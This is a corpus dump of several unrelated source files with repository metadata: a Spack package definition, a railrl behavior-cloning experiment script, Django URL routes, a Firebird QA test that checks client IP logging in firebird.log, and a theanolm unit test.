] | 1 | 2019-01-17T20:07:19.000Z | 2019-01-17T20:07:19.000Z | internal/notes/builtin-SAVE/packages/py-unittest2py3k/package.py | HPCToolkit/hpctest | 5ff4455582bf39e75530a31badcf6142081b386b | [
"BSD-3-Clause"
] | null | null | null | internal/notes/builtin-SAVE/packages/py-unittest2py3k/package.py | HPCToolkit/hpctest | 5ff4455582bf39e75530a31badcf6142081b386b | [
"BSD-3-Clause"
] | 2 | 2019-08-06T18:13:57.000Z | 2021-11-05T18:19:49.000Z | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyUnittest2py3k(PythonPackage):
"""unittest2 is a backport of the new features added to the unittest
testing framework in Python 2.7 and 3.2. This is a Python 3 compatible
version of unittest2."""
homepage = "https://pypi.python.org/pypi/unittest2py3k"
url = "https://pypi.io/packages/source/u/unittest2py3k/unittest2py3k-0.5.1.tar.gz"
version('0.5.1', '8824ff92044310d9365f90d892bf0f09')
depends_on('python@3:')
depends_on('py-setuptools', type='build')
| 43.95 | 91 | 0.683163 | true | true | |
1c3059b8ba36df157f1ad186193f2fa5012b7dbb | 2,845 | py | Python | experiments/murtaza/off_policy_ssl/gym/hopper/bc.py | Asap7772/rail-rl-franka-eval | 4bf99072376828193d05b53cf83c7e8f4efbd3ba | [
"MIT"
] | null | null | null | experiments/murtaza/off_policy_ssl/gym/hopper/bc.py | Asap7772/rail-rl-franka-eval | 4bf99072376828193d05b53cf83c7e8f4efbd3ba | [
"MIT"
] | null | null | null | experiments/murtaza/off_policy_ssl/gym/hopper/bc.py | Asap7772/rail-rl-franka-eval | 4bf99072376828193d05b53cf83c7e8f4efbd3ba | [
"MIT"
] | null | null | null | from railrl.torch.sac.policies import GaussianPolicy
from railrl.launchers.experiments.ashvin.awr_sac_rl import experiment
from railrl.launchers.launcher_util import run_experiment
import railrl.misc.hyperparameter as hyp
if __name__ == "__main__":
variant = dict(
num_epochs=0,
num_eval_steps_per_epoch=5000,
num_trains_per_train_loop=1000,
num_expl_steps_per_train_loop=0,
min_num_steps_before_training=0,
max_path_length=1000,
batch_size=512,
replay_buffer_size=int(1E6),
algorithm="BC",
version="normal",
collection_mode='batch',
load_demos=True,
pretrain_policy=True,
pretrain_rl=True,
layer_size=256,
num_layers=4,
trainer_kwargs=dict(
discount=0.99,
soft_target_tau=5e-3,
target_update_period=1,
policy_lr=3E-4,
qf_lr=3E-4,
reward_scale=1,
beta=1,
use_automatic_entropy_tuning=True,
bc_num_pretrain_steps=1000000,
q_num_pretrain1_steps=0,
q_num_pretrain2_steps=0,
policy_weight_decay=1e-4,
compute_bc=True,
bc_weight=1.0,
rl_weight=0.0,
bc_loss_type='mse',
pretraining_env_logging_period=10000,
do_pretrain_rollouts=True,
),
policy_kwargs=dict(
hidden_sizes=[256] * 4,
max_log_std=0,
min_log_std=-6,
),
path_loader_kwargs=dict(
demo_path='demos/hopper_action_noise_1000.npy',
),
)
search_space = {
'trainer_kwargs.use_automatic_entropy_tuning':[False],
'trainer_kwargs.bc_num_pretrain_steps':[400000],
'trainer_kwargs.bc_weight':[1],
'train_rl':[False],
'pretrain_policy':[True],
'pretrain_rl':[False],
'load_demos':[True],
'path_loader_kwargs.frac_trajs':[.002],
'env': [
'hopper',
],
'policy_class':[
GaussianPolicy,
],
}
sweeper = hyp.DeterministicHyperparameterSweeper(
search_space, default_parameters=variant,
)
n_seeds = 1
mode = 'local'
exp_prefix = 'bc_hopper_frac_trajs_sweep'
# n_seeds = 2
# mode = 'ec2'
# exp_prefix = 'bc_hopper_gym_v2'
for exp_id, variant in enumerate(sweeper.iterate_hyperparameters()):
for _ in range(n_seeds):
run_experiment(
experiment,
exp_prefix=exp_prefix,
mode=mode,
variant=variant,
num_exps_per_instance=1,
use_gpu=True,
gcp_kwargs=dict(
preemptible=False,
),
skip_wait=True,
)
| 29.635417 | 72 | 0.572935 | from railrl.torch.sac.policies import GaussianPolicy
from railrl.launchers.experiments.ashvin.awr_sac_rl import experiment
from railrl.launchers.launcher_util import run_experiment
import railrl.misc.hyperparameter as hyp
if __name__ == "__main__":
variant = dict(
num_epochs=0,
num_eval_steps_per_epoch=5000,
num_trains_per_train_loop=1000,
num_expl_steps_per_train_loop=0,
min_num_steps_before_training=0,
max_path_length=1000,
batch_size=512,
replay_buffer_size=int(1E6),
algorithm="BC",
version="normal",
collection_mode='batch',
load_demos=True,
pretrain_policy=True,
pretrain_rl=True,
layer_size=256,
num_layers=4,
trainer_kwargs=dict(
discount=0.99,
soft_target_tau=5e-3,
target_update_period=1,
policy_lr=3E-4,
qf_lr=3E-4,
reward_scale=1,
beta=1,
use_automatic_entropy_tuning=True,
bc_num_pretrain_steps=1000000,
q_num_pretrain1_steps=0,
q_num_pretrain2_steps=0,
policy_weight_decay=1e-4,
compute_bc=True,
bc_weight=1.0,
rl_weight=0.0,
bc_loss_type='mse',
pretraining_env_logging_period=10000,
do_pretrain_rollouts=True,
),
policy_kwargs=dict(
hidden_sizes=[256] * 4,
max_log_std=0,
min_log_std=-6,
),
path_loader_kwargs=dict(
demo_path='demos/hopper_action_noise_1000.npy',
),
)
search_space = {
'trainer_kwargs.use_automatic_entropy_tuning':[False],
'trainer_kwargs.bc_num_pretrain_steps':[400000],
'trainer_kwargs.bc_weight':[1],
'train_rl':[False],
'pretrain_policy':[True],
'pretrain_rl':[False],
'load_demos':[True],
'path_loader_kwargs.frac_trajs':[.002],
'env': [
'hopper',
],
'policy_class':[
GaussianPolicy,
],
}
sweeper = hyp.DeterministicHyperparameterSweeper(
search_space, default_parameters=variant,
)
n_seeds = 1
mode = 'local'
exp_prefix = 'bc_hopper_frac_trajs_sweep'
for exp_id, variant in enumerate(sweeper.iterate_hyperparameters()):
for _ in range(n_seeds):
run_experiment(
experiment,
exp_prefix=exp_prefix,
mode=mode,
variant=variant,
num_exps_per_instance=1,
use_gpu=True,
gcp_kwargs=dict(
preemptible=False,
),
skip_wait=True,
)
| true | true |
1c305a1689fab06136f359666ffcc90fcdfad923 | 218 | py | Python | pypro/videos/urls.py | rodrigoddc/django-advanced-course | 098507d8111f38f8a6b914575e50861538913f6c | [
"MIT"
] | 1 | 2020-06-30T01:30:31.000Z | 2020-06-30T01:30:31.000Z | pypro/videos/urls.py | rodrigoddc/django-advanced-course | 098507d8111f38f8a6b914575e50861538913f6c | [
"MIT"
] | 102 | 2020-06-30T01:03:27.000Z | 2021-09-22T19:26:44.000Z | pypro/videos/urls.py | rodrigoddc/django-advanced-course | 098507d8111f38f8a6b914575e50861538913f6c | [
"MIT"
] | null | null | null | from django.urls import path
from .views import video_render, video_list
app_name = 'videos'
urlpatterns = [
path('', video_list, name='video_list'),
path('<slug:slug>/', video_render, name='video_render'),
]
| 24.222222 | 60 | 0.706422 | from django.urls import path
from .views import video_render, video_list
app_name = 'videos'
urlpatterns = [
path('', video_list, name='video_list'),
path('<slug:slug>/', video_render, name='video_render'),
]
| true | true |
1c305b37c58edcfc78fee46b861ad540bdec2eff | 14,296 | py | Python | tests/bugs/core_2493_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | [
"MIT"
] | null | null | null | tests/bugs/core_2493_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | [
"MIT"
] | null | null | null | tests/bugs/core_2493_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | [
"MIT"
] | null | null | null | #coding:utf-8
#
# id: bugs.core_2493
# title: Append the IP address of the remote host to error messages in firebird.log for TCP connections
# decription:
# Following actions are performed by this test:
#
# 1. Obtain current firebird.log and saves it to the file with name = 'tmp_2493_fblog_before.txt';
#
# 2. Asynchronously launch ISQL in child process with request to return client IP address (via asking context variable)
# and after this - do some 'heavy query' that for sure will take a lot of time and resources.
# Output is redirected to file with name = 'tmp_2493_isql.log' and will be parsed further (we'll search for client IP there).
#
# 3. Kill launched ISQL process after several seconds. At this point new message must appear in firebird.log and it MUST
# be in format described in the ticket. Because this abend will be detected by SERVER, format of message will be like this:
# (for TCPv4): INET/inet_error: read errno = 10054, client host = prog1, address = 127.0.0.1/4076, user = john
# (for TCPv6): INET/inet_error: read errno = 10054, client host = prog2, address = fe80::c40e:21ec:b5c7:8963/56831, user = mick
#
# 4. Wait several seconds and after it - obtain again firebird.log (new content) and save it in 'tmp_2493_fblog_after.txt'.
#
# 5. Make file comparison by calling method from standard Python tool - difflib. Result of this comparison will be stored
# in file with name 'tmp_2493_diff.txt'. This file will have several lines from which we are interested only for one which
# STARTS with "+" (PLUS sign) and does contain phrase 'INET/INET_ERROR'. Diff-file must contain only ONE such line.
#
# 6. Next we parse this line: remove "/" and "="characters from it and split then text into array of words:
# + INET inet_error read errno 10054 client host prog1 address 127.0.0.1 4417 user john ------- for IPv4
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13
# + INET inet_error read errno 10054 client host prog2 address x::y:z:u:v 56831 user mick ------- for IPv6
# 7. Then we scan this array backward and check tokens for matching simple rules (N = array len):
# * token N-1 must be OS user name; this name can be followed by some kind of "suffix": "JOHN.-1.-1" - and we have to take only 1st word from it.
# NB: we current OS user using call of getpass.getuser(). It must be compared in case insensitive manner;
# * token N-2 is just word "user" (as is);
# * token N-3 is port number, it has to be positive value;
# * token N-4 is IP. It must be equal to rdb$get_context('SYSTEM','CLIENT_ADDRESS').
#
# This is how differences look in firebird.log:
# # 2.5.9:
# # INET/inet_error: read errno = 10054, client address = 127.0.0.1 3268, user ZOTOV.-1.-1
# # ^ ^ ^ ^
# # N-4 N-3 N-2 N-1
# # 3.0.4:
# # INET/inet_error: read errno = 10054, client host = csprog, address = 127.0.0.1 3298, user zotov
# # ^ ^ ^ ^
# # N-4 N-3 N-2 N-1
# # 3.0.8 and 4.0.0 RC1:
# # INET/inet_error: read errno = 10054, client host = csprog, address = fe80::fcf1:e33c:e924:969d%16/56887, user = zotov
# # INET/inet_error: read errno = 10054, client host = csprog, address = fe80::fcf1:e33c:e924:969d%16/56883, user = zotov
#
#
# Checked on WI-V3.0.0.32272 x86 and amd64, OS = Windows XP and 8.1, TCPv4 and TCPv6; fdb version = 1.5, Python 2.7 and 3.4.
# Checked 17.02.2018 after adding 2.5.9 to the list of avaliable versions:
# 2.5.9.27103: OK, 5.547s.
# 3.0.3.32837: OK, 7.079s.
# 3.0.4.32912: OK, 6.094s.
# 4.0.0.800: OK, 7.109s.
# 4.0.0.890: OK, 6.360s.
# ### NB ###
# First version of this test was implemented on Windows XP and Python 2.7.8, build 02-jul-2014 win32.
# Unfortunatelly, on Python 3.4 + Win 8.1 it is unable to use socket.inet_pton() call -exception raises with text:
# "AttributeError: 'module' object has no attribute 'inet_pton'".
# For that reason it was decided do NOT use calls of socket.inet_pton() and operate only with remote_address that can be easy
# received using built-in FB context variable. User-defined functions 'is_valid_ipv4' and 'is_valid_ipv6' are left here for
# possible further usage in some other tests.
#
# 20.02.2021: changed 'platform' attribute to Windows only. Content of firebird.log has no changes on Linux during this test run.
# Perhaps, this is temporary and another solution will be found/implemented. Sent letter to dimitr et al, 21.02.2021 08:20.
#
# tracker_id: CORE-2493
# min_versions: ['2.5.9']
# versions: 2.5.9
# qmid:
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 2.5.9
# resources: None
substitutions_1 = []
init_script_1 = """
recreate table log(ip varchar(255));
create sequence g;
commit;
"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
# test_script_1
#---
# import os
# import time
# import subprocess
# from subprocess import Popen
# import signal
# import difflib
# import re
# import socket
# import getpass
#
# os.environ["ISC_USER"] = user_name
# os.environ["ISC_PASSWORD"] = user_password
#
# engine = str(db_conn.engine_version)
# db_conn.close()
#
# #-----------------------------------
#
# def flush_and_close(file_handle):
# # https://docs.python.org/2/library/os.html#os.fsync
# # If you're starting with a Python file object f,
# # first do f.flush(), and
# # then do os.fsync(f.fileno()), to ensure that all internal buffers associated with f are written to disk.
# global os
#
# file_handle.flush()
# os.fsync(file_handle.fileno())
#
# file_handle.close()
#
# #--------------------------------------------
#
# def cleanup( f_names_list ):
# global os
# for i in range(len( f_names_list )):
# if os.path.isfile( f_names_list[i]):
# os.remove( f_names_list[i] )
# if os.path.isfile( f_names_list[i]):
# print('ERROR: can not remove file ' + f_names_list[i])
#
# #-------------------------------------------
#
#
# def svc_get_fb_log( engine, f_fb_log ):
#
# import subprocess
#
# if engine.startswith('2.5'):
# get_firebird_log_key='action_get_ib_log'
# else:
# get_firebird_log_key='action_get_fb_log'
#
# subprocess.call([ context['fbsvcmgr_path'],
# "localhost:service_mgr",
# get_firebird_log_key
# ],
# stdout=f_fb_log,
# stderr=subprocess.STDOUT
# )
#
# return
#
# #--------------------------------------------
#
# # http://stackoverflow.com/questions/319279/how-to-validate-ip-address-in-python
# def is_valid_ipv4(address):
# import socket
# try:
# socket.inet_pton(socket.AF_INET, address)
# except AttributeError: # no inet_pton here, sorry
# try:
# socket.inet_aton(address)
# except socket.error:
# return False
# return address.count('.') == 3
# except socket.error: # not a valid address
# return False
#
# return True
#
# #--------------------------------------------
#
# def is_valid_ipv6(address):
# import socket
# try:
# socket.inet_pton(socket.AF_INET6, address)
# except socket.error: # not a valid address
# return False
# return True
#
# #--------------------------------------------
#
# f_fblog_before=open(os.path.join(context['temp_directory'],'tmp_2493_fblog_before.txt'), 'w')
#
# svc_get_fb_log( engine, f_fblog_before )
#
# f_fblog_before.close()
#
# isql_txt=''' insert into log(ip) values( rdb$get_context('SYSTEM','CLIENT_ADDRESS') );
# commit;
# select count(i) from (select gen_id(g,1) i from rdb$types a,rdb$types b,rdb$types c,rdb$types d);
# '''
#
# f_sql_txt=open( os.path.join(context['temp_directory'],'tmp_2493_isql.sql'), 'w')
# f_sql_txt.write(isql_txt)
# flush_and_close( f_sql_txt )
#
# f_sql_log=open(os.path.join(context['temp_directory'],'tmp_2493_isql.log'), 'w' )
# f_sql_err=open(os.path.join(context['temp_directory'],'tmp_2493_isql.err'), 'w' )
#
# p_isql=Popen( [ context['isql_path'], dsn, "-i", f_sql_txt.name ], stdout=f_sql_log, stderr=f_sql_err
# )
# time.sleep(3)
#
# p_isql.terminate()
#
# flush_and_close( f_sql_log )
# flush_and_close( f_sql_err )
#
# f_sql_txt=open(os.path.join(context['temp_directory'],'tmp_2493_isql.sql'), 'w')
# f_sql_txt.write("set heading off; select iif(gen_id(g,0) = 0, 'Trouble with subprocess: job was not started.', ip) as msg from log; quit;")
# flush_and_close( f_sql_txt )
#
# mon_ip=subprocess.check_output( [ context['isql_path'], dsn, '-i', f_sql_txt.name ]).split()[0]
#
# f_fblog_after=open(os.path.join(context['temp_directory'],'tmp_2493_fblog_after.txt'), 'w')
#
# svc_get_fb_log( engine, f_fblog_after )
#
# flush_and_close( f_fblog_after )
#
# oldfb=open(f_fblog_before.name, 'r')
# newfb=open(f_fblog_after.name, 'r')
#
# difftext = ''.join(difflib.unified_diff(
# oldfb.readlines(),
# newfb.readlines()
# ))
# oldfb.close()
# newfb.close()
#
# f_diff_txt=open( os.path.join(context['temp_directory'],'tmp_2493_diff.txt'), 'w')
# f_diff_txt.write(difftext)
# flush_and_close( f_diff_txt )
#
# inet_msg_words = []
# logged_err=0
# with open( f_diff_txt.name,'r') as f:
# for line in f:
# if line.startswith('+') and 'INET/INET_ERROR' in line.upper():
# # DO NOT include ':' to the list of delimiters! It is involved in IPv6 address:
# inet_msg_words = line.replace(',',' ').replace('/',' ').replace('=',' ').split()
# break
#
# # Tokens, numerated from zero (NB: leftmost is "PLUS" sign and has index = 0)
# # ---------------------------------------------------------------------------
# # + INET inet_error read errno 10054 client host prog1 address 127.0.0.1 4417 user john ------- for IPv4
# # 0 1 2 3 4 5 6 7 8 9 10 11 12 13
# # + INET inet_error read errno 10054 client host prog2 address x::y:z:u:v 56831 user mick ------- for IPv6
#
# # + INET/inet_error: read errno = 10054, client host = csprog, address = fe80::fcf1:e33c:e924:969d%16/56883, user = zotov
# # 0 1 2 3 4 5 6 7 8 9 10 11 12 --> len() = 13
#
# n = len(inet_msg_words)
#
# parsing_problem_msg = 'Problem with parsing content of firebird.log'
# if len(inet_msg_words) == 0:
# print('%s: message with "inet_error" not found.' % parsing_problem_msg)
# elif len(inet_msg_words) < 4:
# print('%s: message with "inet_error" contains less than 4 tokens.' % parsing_problem_msg)
# else:
#
# #print('Fixed data: '+inet_msg_words[4]+' '+inet_msg_words[5]+' '+inet_msg_words[6]+' '+inet_msg_words[7])
#
# # http://stackoverflow.com/questions/4271740/how-can-i-use-python-to-get-the-system-hostname
#
# # commented 17.02.2017 due to 2.5.9 (no info about remote host there):
# #if inet_msg_words[8].upper()==socket.gethostname().upper():
# # print('Remote host: valid, passed socket.gethostname()')
# #else:
# # print('Invalid host=|'+inet_msg_words[8]+'|')
#
# # does not work on Python 3.4! >>> if is_valid_ipv4(inet_msg_words[10]) or is_valid_ipv6(inet_msg_words[10]):
# if inet_msg_words[n-4] + '/' + inet_msg_words[n-3] == mon_ip:
# print("String IP/port: valid, equal to 'CLIENT_ADDRESS'")
# else:
# print('Invalid IP/port=|'+inet_msg_words[n-4]+'/'+inet_msg_words[n-3]+'| - differ from mon_ip=|'+mon_ip+'|')
#
# if inet_msg_words[n-3].isdigit():
# print('Port value: valid, positive integer.')
# else:
# print('Invalid port=|'+inet_msg_words[n-3]+'|')
#
# if inet_msg_words[n-1].upper().split('.')[0] == getpass.getuser().upper():
# # 2.5.9: got 'ZOTOV.-1.-1' ==> must be kust of one word: 'ZOTOV'
# print('OS user: valid, passed getpass.getuser()')
# else:
# print('Invalid OS user=|'+inet_msg_words[n-1]+'|')
#
#
# # Cleanup.
# ##########
# time.sleep(1)
# cleanup( [i.name for i in (f_sql_txt,f_sql_log,f_sql_err,f_fblog_before,f_fblog_after,f_diff_txt) ] )
#
#
#---
#act_1 = python_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
String IP/port: valid, equal to 'CLIENT_ADDRESS'
Port value: valid, positive integer.
OS user: valid, passed getpass.getuser()
"""
@pytest.mark.version('>=2.5.9')
@pytest.mark.platform('Windows')
@pytest.mark.xfail
def test_1(db_1):
pytest.fail("Test not IMPLEMENTED")
| 45.674121 | 165 | 0.55617 |
#
# 3. Kill launched ISQL process after several seconds. At this point new message must appear in firebird.log and it MUST
# be in format described in the ticket. Because this abend will be detected by SERVER, format of message will be like this:
# (for TCPv4): INET/inet_error: read errno = 10054, client host = prog1, address = 127.0.0.1/4076, user = john
# (for TCPv6): INET/inet_error: read errno = 10054, client host = prog2, address = fe80::c40e:21ec:b5c7:8963/56831, user = mick
#
# 4. Wait several seconds and after it - obtain again firebird.log (new content) and save it in 'tmp_2493_fblog_after.txt'.
#
# 5. Make file comparison by calling method from standard Python tool - difflib. Result of this comparison will be stored
# in file with name 'tmp_2493_diff.txt'. This file will have several lines from which we are interested only for one which
# STARTS with "+" (PLUS sign) and does contain phrase 'INET/INET_ERROR'. Diff-file must contain only ONE such line.
#
# 6. Next we parse this line: remove "/" and "="characters from it and split then text into array of words:
# + INET inet_error read errno 10054 client host prog1 address 127.0.0.1 4417 user john ------- for IPv4
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13
# + INET inet_error read errno 10054 client host prog2 address x::y:z:u:v 56831 user mick ------- for IPv6
# 7. Then we scan this array backward and check tokens for matching simple rules (N = array len):
# * token N-1 must be OS user name; this name can be followed by some kind of "suffix": "JOHN.-1.-1" - and we have to take only 1st word from it.
# NB: we current OS user using call of getpass.getuser(). It must be compared in case insensitive manner;
# * token N-2 is just word "user" (as is);
# * token N-3 is port number, it has to be positive value;
# * token N-4 is IP. It must be equal to rdb$get_context('SYSTEM','CLIENT_ADDRESS').
#
# This is how differences look in firebird.log:
# # 2.5.9:
# # INET/inet_error: read errno = 10054, client address = 127.0.0.1 3268, user ZOTOV.-1.-1
# # ^ ^ ^ ^
# # N-4 N-3 N-2 N-1
# # 3.0.4:
# # INET/inet_error: read errno = 10054, client host = csprog, address = 127.0.0.1 3298, user zotov
# # ^ ^ ^ ^
# # N-4 N-3 N-2 N-1
# # 3.0.8 and 4.0.0 RC1:
# # INET/inet_error: read errno = 10054, client host = csprog, address = fe80::fcf1:e33c:e924:969d%16/56887, user = zotov
# # INET/inet_error: read errno = 10054, client host = csprog, address = fe80::fcf1:e33c:e924:969d%16/56883, user = zotov
#
#
# Checked on WI-V3.0.0.32272 x86 and amd64, OS = Windows XP and 8.1, TCPv4 and TCPv6; fdb version = 1.5, Python 2.7 and 3.4.
# Checked 17.02.2018 after adding 2.5.9 to the list of avaliable versions:
# 2.5.9.27103: OK, 5.547s.
# 3.0.3.32837: OK, 7.079s.
# 3.0.4.32912: OK, 6.094s.
# 4.0.0.800: OK, 7.109s.
# 4.0.0.890: OK, 6.360s.
# ### NB ###
# First version of this test was implemented on Windows XP and Python 2.7.8, build 02-jul-2014 win32.
# Unfortunatelly, on Python 3.4 + Win 8.1 it is unable to use socket.inet_pton() call -exception raises with text:
# "AttributeError: 'module' object has no attribute 'inet_pton'".
# For that reason it was decided do NOT use calls of socket.inet_pton() and operate only with remote_address that can be easy
# received using built-in FB context variable. User-defined functions 'is_valid_ipv4' and 'is_valid_ipv6' are left here for
# possible further usage in some other tests.
#
# 20.02.2021: changed 'platform' attribute to Windows only. Content of firebird.log has no changes on Linux during this test run.
# Perhaps, this is temporary and another solution will be found/implemented. Sent letter to dimitr et al, 21.02.2021 08:20.
#
# tracker_id: CORE-2493
# min_versions: ['2.5.9']
# versions: 2.5.9
# qmid:
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 2.5.9
# resources: None
substitutions_1 = []
init_script_1 = """
recreate table log(ip varchar(255));
create sequence g;
commit;
"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
# test_script_1
#---
# import os
# import time
# import subprocess
# from subprocess import Popen
# import signal
# import difflib
# import re
# import socket
# import getpass
#
# os.environ["ISC_USER"] = user_name
# os.environ["ISC_PASSWORD"] = user_password
#
# engine = str(db_conn.engine_version)
# db_conn.close()
#
# #-----------------------------------
#
# def flush_and_close(file_handle):
# # https://docs.python.org/2/library/os.html#os.fsync
# # If you're starting with a Python file object f,
| true | true |
1c305c2d921ec67d21b2635b4f22173edf4c7a40 | 3,409 | py | Python | tests/theanolm/recurrentstate_test.py | vasuneralla/theanolm | 51fbd89082ca3ea5d0178d09b744cf15c0113ab6 | [
"Apache-2.0"
] | 95 | 2016-01-16T16:18:13.000Z | 2022-01-25T16:31:29.000Z | tests/theanolm/recurrentstate_test.py | nd1511/theanolm | 9eda655ed63e8906234e62ab7da016e64e931afe | [
"Apache-2.0"
] | 43 | 2015-10-16T08:49:26.000Z | 2020-10-12T07:17:04.000Z | tests/theanolm/recurrentstate_test.py | nd1511/theanolm | 9eda655ed63e8906234e62ab7da016e64e931afe | [
"Apache-2.0"
] | 37 | 2016-03-25T23:21:54.000Z | 2020-11-05T11:21:58.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
import math
import numpy
from numpy.testing import assert_equal
from theanolm.network import RecurrentState
class TestRecurrentState(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_init(self):
state = RecurrentState([200, 100, 300], 3)
self.assertEqual(len(state.get()), 3)
self.assertEqual(state.get(0).shape, (1,3,200))
self.assertEqual(state.get(1).shape, (1,3,100))
self.assertEqual(state.get(2).shape, (1,3,300))
assert_equal(state.get(0), numpy.zeros(shape=(1,3,200), dtype='int64'))
assert_equal(state.get(1), numpy.zeros(shape=(1,3,100), dtype='int64'))
assert_equal(state.get(2), numpy.zeros(shape=(1,3,300), dtype='int64'))
layer1_state = numpy.arange(15, dtype='int64').reshape((1, 3, 5))
layer2_state = numpy.arange(30, dtype='int64').reshape((1, 3, 10))
state = RecurrentState([5, 10], 3, [layer1_state, layer2_state])
assert_equal(state.get(0), layer1_state)
assert_equal(state.get(1), layer2_state)
def test_set(self):
state = RecurrentState([5, 10], 3)
layer1_state = numpy.arange(15, dtype='int64').reshape((1, 3, 5))
layer2_state = numpy.arange(30, dtype='int64').reshape((1, 3, 10))
state.set([layer1_state, layer2_state])
assert_equal(state.get(0), layer1_state)
assert_equal(state.get(1), layer2_state)
with self.assertRaises(ValueError):
state.set([layer2_state, layer1_state])
def test_combine_sequences(self):
state1 = RecurrentState([5, 10], 1)
layer1_state = numpy.arange(5, dtype='int64').reshape(1, 1, 5)
layer2_state = numpy.arange(10, 20, dtype='int64').reshape(1, 1, 10)
state1.set([layer1_state, layer2_state])
state2 = RecurrentState([5, 10], 1)
layer1_state = numpy.arange(100, 105, dtype='int64').reshape(1, 1, 5)
layer2_state = numpy.arange(110, 120, dtype='int64').reshape(1, 1, 10)
state2.set([layer1_state, layer2_state])
state3 = RecurrentState([5, 10], 2)
layer1_state = numpy.arange(200, 210, dtype='int64').reshape(1, 2, 5)
layer2_state = numpy.arange(210, 230, dtype='int64').reshape(1, 2, 10)
state3.set([layer1_state, layer2_state])
combined_state = RecurrentState.combine_sequences([state1, state2, state3])
self.assertEqual(combined_state.num_sequences, 4)
self.assertEqual(len(combined_state.get()), 2)
self.assertEqual(combined_state.get(0).shape, (1,4,5))
self.assertEqual(combined_state.get(1).shape, (1,4,10))
assert_equal(combined_state.get(0), numpy.asarray(
[[list(range(5)),
list(range(100, 105)),
list(range(200, 205)),
list(range(205, 210))]],
dtype='int64'))
assert_equal(combined_state.get(1), numpy.asarray(
[[list(range(10, 20)),
list(range(110, 120)),
list(range(210, 220)),
list(range(220, 230))]],
dtype='int64'))
state4 = RecurrentState([5, 11], 2)
with self.assertRaises(ValueError):
combined_state = RecurrentState.combine_sequences([state1, state2, state3, state4])
if __name__ == '__main__':
unittest.main()
| 39.639535 | 95 | 0.61983 |
import unittest
import math
import numpy
from numpy.testing import assert_equal
from theanolm.network import RecurrentState
class TestRecurrentState(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_init(self):
state = RecurrentState([200, 100, 300], 3)
self.assertEqual(len(state.get()), 3)
self.assertEqual(state.get(0).shape, (1,3,200))
self.assertEqual(state.get(1).shape, (1,3,100))
self.assertEqual(state.get(2).shape, (1,3,300))
assert_equal(state.get(0), numpy.zeros(shape=(1,3,200), dtype='int64'))
assert_equal(state.get(1), numpy.zeros(shape=(1,3,100), dtype='int64'))
assert_equal(state.get(2), numpy.zeros(shape=(1,3,300), dtype='int64'))
layer1_state = numpy.arange(15, dtype='int64').reshape((1, 3, 5))
layer2_state = numpy.arange(30, dtype='int64').reshape((1, 3, 10))
state = RecurrentState([5, 10], 3, [layer1_state, layer2_state])
assert_equal(state.get(0), layer1_state)
assert_equal(state.get(1), layer2_state)
def test_set(self):
state = RecurrentState([5, 10], 3)
layer1_state = numpy.arange(15, dtype='int64').reshape((1, 3, 5))
layer2_state = numpy.arange(30, dtype='int64').reshape((1, 3, 10))
state.set([layer1_state, layer2_state])
assert_equal(state.get(0), layer1_state)
assert_equal(state.get(1), layer2_state)
with self.assertRaises(ValueError):
state.set([layer2_state, layer1_state])
def test_combine_sequences(self):
state1 = RecurrentState([5, 10], 1)
layer1_state = numpy.arange(5, dtype='int64').reshape(1, 1, 5)
layer2_state = numpy.arange(10, 20, dtype='int64').reshape(1, 1, 10)
state1.set([layer1_state, layer2_state])
state2 = RecurrentState([5, 10], 1)
layer1_state = numpy.arange(100, 105, dtype='int64').reshape(1, 1, 5)
layer2_state = numpy.arange(110, 120, dtype='int64').reshape(1, 1, 10)
state2.set([layer1_state, layer2_state])
state3 = RecurrentState([5, 10], 2)
layer1_state = numpy.arange(200, 210, dtype='int64').reshape(1, 2, 5)
layer2_state = numpy.arange(210, 230, dtype='int64').reshape(1, 2, 10)
state3.set([layer1_state, layer2_state])
combined_state = RecurrentState.combine_sequences([state1, state2, state3])
self.assertEqual(combined_state.num_sequences, 4)
self.assertEqual(len(combined_state.get()), 2)
self.assertEqual(combined_state.get(0).shape, (1,4,5))
self.assertEqual(combined_state.get(1).shape, (1,4,10))
assert_equal(combined_state.get(0), numpy.asarray(
[[list(range(5)),
list(range(100, 105)),
list(range(200, 205)),
list(range(205, 210))]],
dtype='int64'))
assert_equal(combined_state.get(1), numpy.asarray(
[[list(range(10, 20)),
list(range(110, 120)),
list(range(210, 220)),
list(range(220, 230))]],
dtype='int64'))
state4 = RecurrentState([5, 11], 2)
with self.assertRaises(ValueError):
combined_state = RecurrentState.combine_sequences([state1, state2, state3, state4])
if __name__ == '__main__':
unittest.main()
| true | true |
1c305cc64a034db53b5866f7d0d85806c73acbfd | 1,700 | py | Python | app/portal/horizon/openstack_dashboard/dashboards/identity/users/urls.py | haoshen61/f5-adcaas-openstack | 4bda29271930bf7c621f4184bda8d43b2fa96336 | [
"Apache-2.0"
